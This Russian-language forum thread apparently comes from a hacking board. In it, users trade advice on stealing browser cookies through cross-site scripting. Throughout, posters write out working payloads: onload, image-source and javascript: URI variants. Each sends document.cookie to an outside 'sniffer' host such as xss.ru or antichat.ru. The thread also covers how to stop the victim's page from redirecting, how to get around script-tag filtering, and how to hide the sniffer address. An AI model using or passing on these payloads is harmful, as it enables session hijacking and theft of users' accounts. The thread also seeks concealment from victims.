onload='document.location="http://xss.ru/coc.gif?;"+document.cookie' этот использует функцию onload также можно onmouseover onmoseout onerror и т.д Но проблема со всеми то что, как страница открывается или когда наводишь курсор на картинку то браузер переходит на страницу которую указал в document.location Как сделать так, чтобы оставалась таже странице но - никуда не перебрасывало но http://xss.ru/coc.gif?;"+document.cookie срабатывало? Также прочитал http://forum.antichat.ru/thread18719-xss.html Пробовал закодировать свой http://xss.ru/coc.gif?;"+document.cookie в base 64 aHR0cDovL3hzcy5ydS9jb2MuZ2lmPzsiK2RvY3VtZW50LmNvb2tpZQ== и когда это встовлял в onload='document.location="aHR0cDovL3hzcy5ydS9jb2MuZ2lmPzsiK2RvY3VtZW50LmNvb2tpZQ==' То сниффер не срабатывал. Чем можно это закодировать, чтоб снифер работал, при этом ссылки сниффера видно не было?
Попробуй через картинку... <script> img = new Image() img.src = "адресс_снифака"+document.cookie; </script> так ты не кодируй http:// и слеши тоже =))) И тогда все будет работать =)
Script не могу использовать - фильтруется. Пробовал закодировать http://xss.ru/coc.gif?;"+document.cookie в http://eHNzLnJ1/Y29jLmdpZg==?;"+ZG9jdW1lbnQuY29va2ll Не пашет.
Помогите очень, очень надо (javascript:document.location='http://site.ru/snf.gif?;'+document.cookie) Открывается в новом окне, как сделать чтоб это срабатывало как картинка и не перескакивало на другую страницу чета типо (javascript:image.src='http://site.ru/snf.gif?;'+document.cookie) - только это не работает Зарание благодарен.
Хм... странно... поробуй тогда так: Code: javascript:img=new%20Image();img.src="http://site.ru/snf.gif?"+document.cookie И вот еще один пример, но он работает только в том случае если есть хоть одна картинка на странице в которую ты будешь совать снифер: Code: javascript:document.images[0].src="http://antichat.ru/cgi-bin/s.jpg?"+document.cookie
